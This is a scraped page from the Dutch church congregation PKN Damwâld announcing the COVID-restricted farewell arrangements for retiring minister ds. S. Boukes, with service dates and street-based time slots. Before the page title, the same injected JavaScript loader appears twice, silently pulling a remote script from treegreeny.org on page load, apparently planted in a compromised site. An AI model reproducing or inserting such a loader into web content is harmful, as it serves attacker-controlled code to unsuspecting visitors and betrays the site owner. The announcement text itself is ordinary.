;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Afscheid ds. S. Boukes - PKN Damwâld

Afscheid ds. S. Boukes

Gepubliceerd op: vrijdag 23 april 2021

In vorige edities van de Paadwizer hebben wij U al geïnformeerd over het ophanden zijnde emeritaat van Ds. Boukes. Ook hebben wij toen noodgedwongen ‘pas op de plaats’ moeten maken over de manier waarop het afscheid van ds. Boukes kan worden geregeld. Nog steeds zijn er grote belemmeringen om een afscheid te organiseren dat passend is en zoals wij het graag zouden willen, maar getracht wordt om binnen de huidige regels een en ander zo goed en ongedwongen mogelijk te organiseren.

De formele afscheidsdienst zal zijn op zondag 30 mei om 9.30 uur in de Ontmoeting. Over de inhoud van deze dienst kunnen wij meedelen dat het in principe een kerkdienst zal zijn helemaal in het teken van het afscheid van Ds. Boukes. Op dit moment weten wij nog niet hoeveel mensen bij de dienst aanwezig kunnen zijn. Gelukkig is deze dienst in ieder geval te volgen als livestream ! Mocht het zo zijn dat het mogelijk is om op verantwoorde wijze meer dan 30 personen in de kerk toe te laten dan laten wij U dit zo spoedig mogelijk weten.

In de week voorafgaand aan 30 mei kunnen de gemeenteleden afscheid nemen van dominee. Wij denken dit corona-proof te kunnen organiseren door een ieder van de gemeente die dat wil te ontvangen in de kerk en via een bepaalde looproute door de kerk te leiden. Tijdens dit afscheid kunnen wij U een kop koffie / thee aanbieden met een bescheiden traktatie. Het afscheid wordt gehouden op dinsdag 25 mei; u kunt kiezen tussen dinsdagmiddag of dinsdagavond. Vanwege de corona hebben we de volgende (tijds-) indeling gemaakt:

  • De leden uit Damwâld Noord van 15.00 tot 16.00 uur en van 19.30 tot 20.15 uur.
  • De leden uit Damwâld Zuid van 16.00 tot 17.00 uur en van 20.15 tot 21.00 uur.
  • De leden uit de buitenwijken kunnen zelf hun keuze bepalen.

Damwâld Noord is de Doniawei met oneven huisnummers, de Foarwei met even huisnummers en de Hearewei met even huisnummers en alle straten die aan de noordkant van dit gebied liggen.
Damwâld Zuid is de Doniawei met even huisnummers, de Foarwei met oneven huisnummers en de Hearewei met oneven huisnummers en alle straten die aan de zuidkant van dit gebied liggen.

Natuurlijk is het niet erg wanneer u verhinderd bent of om redenen van vervoer op de aan uw straat toegewezen tijd dat U in een ander tijdvak afscheid neemt maar wij vragen U zich zoveel mogelijk te houden aan de aangegeven tijdstippen. Voor de mensen in Nij Tjaerda wordt een afscheid geregeld op donderdag 27 mei vanaf 10.15 uur in Nij Tjaerda.

Uiteraard is het niet mogelijk dat U een persoonlijk lang gesprek met dominee aangaat maar U kunt wel iets persoonlijks aan hem overhandigen, zoals bijvoorbeeld een kaart, een gedicht of wat dan ook waarin U Uw persoonlijke ervaringen, herinneringen en wensen voor de toekomst met hem kunt delen. Wij hopen en vertrouwen dat wij op deze manier toch op een goede, waardevolle en warme wijze afscheid kunnen nemen van Ds. Boukes.

PS: Blijft U de berichtgeving op de Klok volgen want wanneer er ruimere mogelijkheden zijn wordt U daarover geïnformeerd.